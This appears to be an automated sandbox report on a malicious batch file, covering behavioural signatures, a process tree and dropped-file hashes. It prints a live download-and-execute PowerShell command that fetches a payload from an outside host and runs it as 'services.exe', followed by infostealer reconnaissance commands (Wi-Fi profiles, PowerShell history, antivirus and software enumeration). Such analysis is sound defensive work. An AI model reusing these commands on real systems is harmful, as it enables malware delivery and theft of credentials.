Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    929s
  • max time network
    828s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/07/2024, 17:48

General

  • Target

    frdddd.bat

  • Size

    255B

  • MD5

    7cfc0e137d5d8b7f808add077083360b

  • SHA1

    af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9

  • SHA256

    596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5

  • SHA512

    9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Users\Admin\AppData\Local\Temp\services.exe
        "C:\Users\Admin\AppData\Local\Temp\services.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 1 1.1.1.1
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3540
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            PID:3064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic cpu get name
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic cpu get name
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic os get Caption /value
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3096
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic os get Caption /value
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get currentrefreshrate
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3520
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Content (Get-PSReadlineOption).HistorySavePath
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c tasklist
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:544
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:1268
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c systeminfo
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\SysWOW64\systeminfo.exe
            systeminfo
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers system information
            PID:3096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh wlan show profile
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3400
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profile
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3828
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3244
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1172
          4⤵
          • Program crash
          PID:3344
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2136
    • C:\Windows\system32\BackgroundTransferHost.exe
      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
      1⤵
        PID:3776
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x494 0x454
        1⤵
          PID:3636
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:2196
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1388
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2964 -ip 2964
          1⤵
            PID:2984

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            c580727fc0a7a733ea6a446b67ca63f7

            SHA1

            ebdd57fca25df0f759dec07c5382d560df7600c2

            SHA256

            369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073

            SHA512

            2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            3f9471c349b1f3de27e640979fa4c2cd

            SHA1

            a387f843f5717aaab62c172839f365668a69d0b6

            SHA256

            0b1e1805b4a0043da17906a1c1a800fdb35ac3130d8d6b747a2c03d0ee458973

            SHA512

            87c2278b751ee1cff920cab744747c90348b276dfeb938fa426f33ae6c3fa70a4e3dbae3ed5169b153f9c6b4b844790f923fe332a8125bf9111bb2bf8d0458f4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            20KB

            MD5

            43fb4c3431d333e211203b8b7b7091d5

            SHA1

            7cc7932de4bf095fc70dbe3fd68c41ad92ba22e0

            SHA256

            fad93544286f033ebe4b786f7ff5f5bd35d0cfd10acc01f7a089d1747f396b45

            SHA512

            659f7f7b135508ebf8389ac15ec1f935d6aeb4320be4947c5fd8e593befc7444141e249e8d35029979cf989829dc6e3f59afcb90975cb46695c9f1dc69955edc

          • C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt

            Filesize

            8KB

            MD5

            c1b2e5790cbc36c8d732bafad920c24c

            SHA1

            cd235bb8abee255db783e7c6390a599022ae17fd

            SHA256

            06afdd368fdf472f0841302fe7853567dee32b4d8d638a57cb7c2a284438a391

            SHA512

            974c3929312f5f198a7e94ac3748925fbacd55259c38f179c849fbefb12682010e0faf3a588f3a031448628960211809169436ee714d04d835aaf9d312925a51

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2lvo2cby.poa.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\services.exe

            Filesize

            4.5MB

            MD5

            b85914d36703377812cba113ca4638b7

            SHA1

            3c68a49b599dac13f4cb7cd327ad7c9c15313381

            SHA256

            2ef086862494efd63cfacf30753bb2df9dd55f18d04e71fb912e79d47657b9d3

            SHA512

            45ae20f08b16c8056cf4cd5a7e65f4f6b593cf41ca63431d0db153ddcfbbf28b1bff92800093cf48ca4b66c35afd3a626862559a247052b2ff5dc4c426a29a07

          • memory/1272-11-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp

            Filesize

            10.8MB

          • memory/1272-12-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp

            Filesize

            10.8MB

          • memory/1272-60-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp

            Filesize

            10.8MB

          • memory/1272-186-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp

            Filesize

            10.8MB

          • memory/1272-10-0x0000027FFBE00000-0x0000027FFBE22000-memory.dmp

            Filesize

            136KB

          • memory/1272-0-0x00007FFF11ED3000-0x00007FFF11ED5000-memory.dmp

            Filesize

            8KB

          • memory/1272-59-0x00007FFF11ED3000-0x00007FFF11ED5000-memory.dmp

            Filesize

            8KB

          • memory/1272-55-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp

            Filesize

            10.8MB

          • memory/1388-168-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-173-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-176-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-177-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-178-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-174-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-167-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-172-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-166-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/1388-175-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp

            Filesize

            4KB

          • memory/2964-164-0x0000000000400000-0x0000000000E59000-memory.dmp

            Filesize

            10.3MB

          • memory/2964-182-0x0000000000400000-0x0000000000E59000-memory.dmp

            Filesize

            10.3MB

          • memory/2964-21-0x0000000000400000-0x0000000000E59000-memory.dmp

            Filesize

            10.3MB

          • memory/2964-20-0x000000000082C000-0x00000000009CE000-memory.dmp

            Filesize

            1.6MB

          • memory/2964-18-0x0000000000400000-0x0000000000E59000-memory.dmp

            Filesize

            10.3MB

          • memory/3244-69-0x0000000006120000-0x0000000006474000-memory.dmp

            Filesize

            3.3MB

          • memory/3244-75-0x0000000006C10000-0x0000000006C5C000-memory.dmp

            Filesize

            304KB

          • memory/3688-25-0x0000000005020000-0x0000000005042000-memory.dmp

            Filesize

            136KB

          • memory/3688-46-0x00000000084A0000-0x0000000008A44000-memory.dmp

            Filesize

            5.6MB

          • memory/3688-45-0x00000000074E0000-0x0000000007502000-memory.dmp

            Filesize

            136KB

          • memory/3688-44-0x0000000007550000-0x00000000075E6000-memory.dmp

            Filesize

            600KB

          • memory/3688-43-0x0000000007140000-0x000000000715A000-memory.dmp

            Filesize

            104KB

          • memory/3688-42-0x0000000007870000-0x0000000007EEA000-memory.dmp

            Filesize

            6.5MB

          • memory/3688-41-0x0000000007170000-0x00000000071E6000-memory.dmp

            Filesize

            472KB

          • memory/3688-40-0x0000000007070000-0x00000000070B4000-memory.dmp

            Filesize

            272KB

          • memory/3688-39-0x00000000060A0000-0x00000000060EC000-memory.dmp

            Filesize

            304KB

          • memory/3688-38-0x0000000006050000-0x000000000606E000-memory.dmp

            Filesize

            120KB

          • memory/3688-37-0x00000000059C0000-0x0000000005D14000-memory.dmp

            Filesize

            3.3MB

          • memory/3688-27-0x00000000058F0000-0x0000000005956000-memory.dmp

            Filesize

            408KB

          • memory/3688-26-0x0000000005810000-0x0000000005876000-memory.dmp

            Filesize

            408KB

          • memory/3688-24-0x00000000050E0000-0x0000000005708000-memory.dmp

            Filesize

            6.2MB

          • memory/3688-23-0x00000000026E0000-0x0000000002716000-memory.dmp

            Filesize

            216KB